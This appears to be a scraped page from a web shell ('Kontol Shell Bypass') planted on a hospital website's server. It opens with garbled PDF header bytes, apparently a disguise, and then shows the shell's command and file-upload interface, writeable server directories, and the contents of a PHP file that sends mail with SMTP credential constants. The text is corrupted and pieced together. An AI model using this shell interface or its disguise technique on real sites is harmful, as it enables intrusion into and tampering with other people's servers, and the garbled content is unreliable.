%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/lp/nephrology/classes/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/lp/nephrology/classes/smtp_function.php
<?php
 function sendMail($subject, $body, $to) {
        $this->mail = new PHPMailer();
        $this->mail->isSMTP();                                      // Set mailer to use SMTP
        $this->mail->Host = SMTP_HOST;  // Specify main and backup SMTP servers
        $this->mail->SMTPAuth = SMTP_AUTH;                               // Enable SMTP authentication
        $this->mail->Username = SMTP_USERNAME;              // SMTP username
        $this->mail->Password = SMTP_PASSWORD;                           // SMTP password
        $this->mail->SMTPSecure = SMTP_SECURE;                            // Enable TLS encryption, `ssl` also accepted
        $this->mail->Port = SMTP_PORT;                                    // TCP port to connect to
        $this->mail->From = FROM_EMAIL_ID;
        $this->mail->FromName = FROM_EMAIL_NAME;
        $this->mail->addReplyTo(SMTP_REPLY_EMAIL_ID, SMTP_REPLY_NAME);
        $this->mail->mailCC = explode(",", MAIL_CC);
        foreach ($this->mail->mailCC as $cc) {
            error_log(trim($cc));
            $this->mail->addCC(trim($cc));
        }
        $this->mail->isHTML(true);
        $this->mail->Subject = $subject;
        $this->mail->Body = $body;
        $this->mail->addAddress($to); // Add a recipient
        $this->mail->send();
    }
	
	    function sendMail2($subject2, $body2, $to2) {
        $this->mail = new PHPMailer();
        $this->mail->isSMTP();                                      // Set mailer to use SMTP
        $this->mail->Host = SMTP_HOST;  // Specify main and backup SMTP servers
        $this->mail->SMTPAuth = SMTP_AUTH;                               // Enable SMTP authentication
        $this->mail->Username = SMTP_USERNAME;              // SMTP username
        $this->mail->Password = SMTP_PASSWORD;                           // SMTP password
        $this->mail->SMTPSecure = SMTP_SECURE;                            // Enable TLS encryption, `ssl` also accepted
        $this->mail->Port = SMTP_PORT;                                    // TCP port to connect to
        $this->mail->From = FROM_EMAIL_ID;
        $this->mail->FromName = FROM_EMAIL_NAME;
        $this->mail->addReplyTo(SMTP_REPLY_EMAIL_ID, SMTP_REPLY_NAME);
        $this->mail->mailCC = explode(",", MAIL_CC2);
        foreach ($this->mail->mailCC as $cc2) {
            error_log(trim($cc2));
            $this->mail->addCC(trim($cc2));
        }
        $this->mail->isHTML(true);
        $this->mail->Subject = $subject2;
        $this->mail->Body = $body2;
        $this->mail->addAddress($to2); // Add a recipient
        $this->mail->send();
    }
	
	?>

Kontol Shell Bypass